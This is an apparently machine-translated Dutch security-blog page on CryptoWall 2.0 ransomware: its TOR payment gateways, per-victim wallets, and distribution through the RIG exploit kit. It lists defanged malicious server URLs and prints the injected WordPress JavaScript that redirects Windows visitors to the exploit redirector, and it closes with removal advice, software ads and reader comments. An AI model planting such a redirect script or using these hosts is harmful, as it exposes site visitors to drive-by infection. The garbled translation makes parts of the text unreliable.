Verwijder CryptoWall 2.0 en herstel van de gecodeerde bestanden - Hoe, Technologie en PC Security Forum | SensorsTechForum.com
BEDREIGING VERWIJDEREN

Verwijder CryptoWall 2.0 en herstel van de gecodeerde bestanden

1 Star2 Stars3 Stars4 Stars5 Stars (Nog geen beoordeling)
Loading ...

Remove-CryptoWall2.0
Het CryptoWall ransomware is een enorme bedreiging voor netwerkbeheerders en pc-gebruikers geweest, sinds het in eerste instantie werd uitgebracht omdat het codeert de lokale gegevens en data te vinden op netwerkshares. De nieuwe versie van de ransomware, CryptoWall 2.0 is nu verbeterd, dat maakt het nog moeilijker voor de gebruiker om de gecodeerde bestanden te herstellen zonder het betalen van het losgeld.

CryptoWall 2.0 – Wat is er nieuw?

De cybercriminelen gebruiken hun eigen TOR gateways in de nieuwste versie CryptoWall. Een individuele portemonnee ID wordt voor elk afzonderlijk slachtoffer in plaats van de eerder gebruikte hard gecodeerd links die dezelfde waren voor bijna alle slachtoffers verzonden. Ook, de originele onversleutelde bestanden worden nu veilig verwijderd.

Eigen TOR Gateways

Het losgeld betalen servers van CyptoWall bevinden zich op TOR. Hierdoor kan de ransomware makers om verborgen van de autoriteiten te blijven. Voor de gebruiker in staat zijn om verbinding te maken met de server, hij nodig heeft om toegang te krijgen tot het TOR netwerk, en de meeste gebruikers vinden het nogal moeilijk om TOR in de eerste plaats te installeren. Dat is de reden waarom CryptoWall gebruikt een Web-to-TOR gateway waardoor de ransomware slachtoffers om gemakkelijk toegang te krijgen tot de betaling van de server. Omdat de aanbieders van deze gateway besefte wat er gebeurde, ze begonnen aan blacklist hun betalingsverplichtingen servers, zodat ze niet zullen worden gebruikt voor kwaadaardige doeleinden. De nieuwe versie van CryptoWall heeft nu zijn eigen betaling servers - pay2tor.com, tor4pay.com en pay4tor.com.

Een unieke Wallet ID voor elk slachtoffer

De gebruikers die ervoor koos om het losgeld te betalen, worden voorzien van een individuele portemonnee ID die uniek is voor elk slachtoffer. Aanvankelijk, de gebruikers werd niet aangeboden met deze optie, waardoor mensen tot betalingstransacties van andere gebruikers te stelen en te gebruiken als hun eigen losgeld betalingen. De unieke betalingsadressen voor elk slachtoffer is niet meer mogelijk.

The Original versleutelde bestanden worden veilig Verwijderde

Dit is een andere nieuwe functie voor de CryptoWall 2.0. In de vorige versie, de ransomware zou versleutelen data bestanden van het slachtoffer en dan gewoon verwijderen van de originele zijn. Dit maakte het mogelijk voor data recovery tools om de informatie die is gecodeerd herstellen. Deze methode kan niet meer worden toegepast als CryptoWall 2.0 veilig verwijdert de gegevens van het slachtoffer. Dit laat de gebruiker gecompromitteerd slechts twee opties: ofwel om de bestanden te herstellen van back-ups of om het vereiste bedrag te betalen.

CryptoWall 2.0 Verspreid via de RIG Exploit Kit

Beveiliging Deskundigen hebben recent waargenomen hackers uitbuiten kwetsbaar WordPress koppelingen om computergebruikers te leiden naar servers die als host fungeren voor de RIG Exploit Kit. De laatste misbruiken van een groot aantal kwetsbaarheden in ongepatchte Flash, Java en vele andere toepassingen in om de nieuwe versie van de CryptoWall ransomware vallen. Volgens dynamoo's Blog, de spammers achter deze campagne zijn dezelfde die de recente eFax spambericht verdeeld, maar deze keer zijn ze leveren CryptoWall 2.0 plaats. Dezelfde blog onthult ook de volgende informatie:

  • hxxp://206.253.165.76:8080 wordt de server waarop de RIG Exploit Kit.
  • hxxp://206.253.165.76:8080/ord / rot.php is de exploit redirector.
  • hxxp://206.253.165.76:8080/ord / ef.html is de spam gemeld door het blog.

De gecompromitteerde WordPress koppelingen zijn bekend bij deze code bevatten:

→script
var OSName = "Onbekend OS";
indien (navigator.appVersion.indexOf("Win")!= -1) OSName = "Windows"; indien (navigator.appVersion.indexOf("Mac")!= -1) OSName = "MacOS"; indien (navigator.appVersion.indexOf("X11")!= -1) OSName = "UNIX"; indien (navigator.appVersion.indexOf("Linux")!= -1) OSName = "Linux"; Var1 = 112; var2 = var1;
indien(OSName == "Windows") {location.replace("Hxxp://206.253.165.76:8080/ord / rot.php ");}anders{location.replace("Http://google.com/search?q = efax ");}
/script

Hoe te CryptoWall Verwijder 2.0 en herstel van de gecodeerde bestanden

Stage One: Verwijder CryptoWall 2.0

1. Eerste en belangrijkste - download en installeer dan een legitieme en betrouwbare anti-malware scanner, die zal u helpen om een ​​volledige systeemscan uit te voeren en alle dreigingen te elimineren.donload_now_250
Spy Hunter systeem scanner zal alleen de bedreiging op te sporen. Als u wilt dat de bedreiging voor automatisch verwijderd, je nodig hebt om de volledige versie van de malware gereedschap kopen. Ontdek meer over SpyHunter Anti-Malware Tool

2. Voer een tweede scan om ervoor te zorgen dat er geen schadelijke software programma's die op uw pc. Daartoe, het is aan te raden om ESET Online Scanner downloaden.

Uw pc moet nu schoon zijn.

De tweede fase: De gecodeerde bestanden te herstellen

Optie 1: Best case scenario - Je hebt een back-up van uw gegevens op een regelmatige basis, en nu kunt u de meest recente back-up te gebruiken om uw bestanden te herstellen.

Optie 2: Probeer om uw bestanden te decoderen met behulp van Kaspersky's RectorDecryptor.exe en RakhniDecryptor.exe. Ze kunnen u helpen in het proces, maar houd in gedachten dat ze niet speciaal zijn ontworpen om informatie die werd gedecodeerd door deze bijzondere ransomware versleutelen.

Optie 3: Shadow Volume Kopieën

1. Installeer de Shadow Explorer, die beschikbaar is met Windows Vista, Windows 7, Windows 8 en Windows XP Service Pack 2.

2. Van Shadow Explorer drop down menu kiezen voor een rit en de laatste datum wilt u informatie van het herstel.

3. Klik met de rechtermuisknop op een willekeurige versleuteld bestand of de map en selecteer "Export". Selecteer een locatie om de inhoud van het geselecteerde bestand of de map te herstellen.

Verwijder CryptoWall 2.0 Automatisch met Spy Hunter Malware – Removal Tool.

donload_now_250
Spy Hunter scanner zal alleen de bedreiging op te sporen. Als u wilt dat de bedreiging voor automatisch verwijderd, je nodig hebt om de volledige versie van de anti-malware gereedschap kopen.Ontdek meer over SpyHunter Anti-Malware Tool / Hoe te verwijderen SpyHunter

avatar

Berta Bilbao

Berta is een speciale malware onderzoeker, dromen voor een veiliger cyberspace. Haar fascinatie voor IT-beveiliging begon een paar jaar geleden, toen een malware haar uit haar eigen computer op slot.

Meer berichten

6 Reacties

  1. avatarrelic99

    De aangepaste versie zal u te houden van het uitvoeren of installeren van een virus oplossingen, verwijder de geïnfecteerde schijf en slave op een andere computer voor het scannen. Een betaald abonnement op CryptoPrevent is de enige tool die ik ken om infecties van de v2 voorkomen.

    1. avatarVlaamse gaai

      Ik liep in wat moet zijn geweest een nieuwe variant slechts een paar dagen geleden. Ik kon het niet uit te roeien met de getroffen ramen actieve machine, dus ik gezwoegd ook de geïnfecteerde schijf naar een niet-geïnfecteerde machine, en ging om de hele schijf met de volgende scan: Malwarebytes, Hitman Pro, TDSSKiller, Avast Antivirus, en tenslotte gevolgd door ESET. En de infectie nog kwam terug zodra het apparaat is aangesloten op het internet, blijkbaar te haken sommige Internet Explorer proces om dat te doen. Ik kon er geen DNS-wijzigingen vinden, geen HOSTS bestand wijzigingen, en geen Winsock haken of BHO's geïnstalleerd om rekening te houden met het. Uiteindelijk heb ik het schoonvegen van de drive en het doen van een fabriek te herstellen. Iets wat ik zelden doen voor malware-infecties. Voorafgaand aan het doen dat ik probeerde om bestanden van schaduwkopieën te herstellen (Overwinning 7 64bit), en niemand aanwezig waren als de malware had weggevaagd de systeemherstelpunten en al shadow bestand kopieën. Ik gelukkig was in staat om een ​​aantal bestanden die nog niet waren gecodeerd herstellen, dus het was niet een totaal verlies. Dit was mijn eerste kennismaking met CryptoWall, en ondanks na het gegeven advies dat ik had gevonden op het wegnemen van het op diverse security forums,het kwam steeds terug helaas. Ik moest nederlaag toegeven. Vervelende bug.

  2. avatarAyesha

    CryptoWall 2.0 is wat ik kreeg ik erachter wat het was dagen later belde . Maar het kwam niet verwijderen ? De originelen ? Zoals ik ging kijken / als ik gebruikte recovery software de beste die er zijn. Ik kreeg het virus op 11-18-2014

  3. avatarChris

    Ik kreeg het virus rond 11/11/2014. Tenminste, dat was de dag dat ik erachter wat het was en draaide mijn machine uit en opnieuw opgestart in de veilige modus na het doen van onderzoek. Sindsdien heb ik geprobeerd om erachter te komen hoe de bestanden die zijn gecodeerd herstellen. Ik heb 2 maanden waarde van de foto's die zijn gecodeerd, maar de informatie klopt niet. Ik hoop dat iemand kan enig licht werpen op het probleem. Als een bestand wordt dan gecodeerd zou de datum gewijzigd of gemaakt Wees de datum waarop het is gecodeerd? Ik probeerde met behulp van Recuva en andere software te herstellen, maar het zegt het is niet verwijderd. Alle ideeën?

  4. avatarHipolito Gonzalez

    Hallo goedemorgen, mijn pc virus geïnfecteerde criptowall geloof v3.0, en mijn bestanden zijn versleuteld met RSA publieke sleutel 2048 en ik nodig om te herstellen, als iemand mij kan helpen zal ik veel dank.
    Groeten
    Hipolito

    1. avatarMilena Dimitrova

      Er Hipolito,

      Het spijt ons te horen dat u zijn besmet met CryptoWall 2.0! Alsjeblieft join ons forum en lees de volgende onderwerpen: http://sensorstechforum.com/forums/internet-and-networking-security/help-decrypt-files-encrypted-by-cryptowall-3-0/
      http://sensorstechforum.com/forums/malware-removal-questions-and-guides/how-to-remove-cryptowall-4-0-and-restore-your-data/

      Helaas, RSA-encryptie 2048 is heel moeilijk te doorbreken. We hopen dat het in de onderwerpen genoemd helpen u uw bestanden herstellen! Aarzel niet om ons te vragen als u nog andere vragen.

      Milena en STF team

Laat een bericht achter

Uw e-mailadres wordt niet gepubliceerd. Verplichte velden zijn gemarkeerd *

Termijn is uitgeput. Laad CAPTCHA.

Delen op Facebook Aandeel
Loading ...
Delen op Twitter Gekwetter
Loading ...
Delen op Google Plus Aandeel
Loading ...
Delen op Linkedin Aandeel
Loading ...
Delen op Digg Aandeel
Deel op Reddit Aandeel
Loading ...
Delen op StumbleUpon Aandeel
Loading ...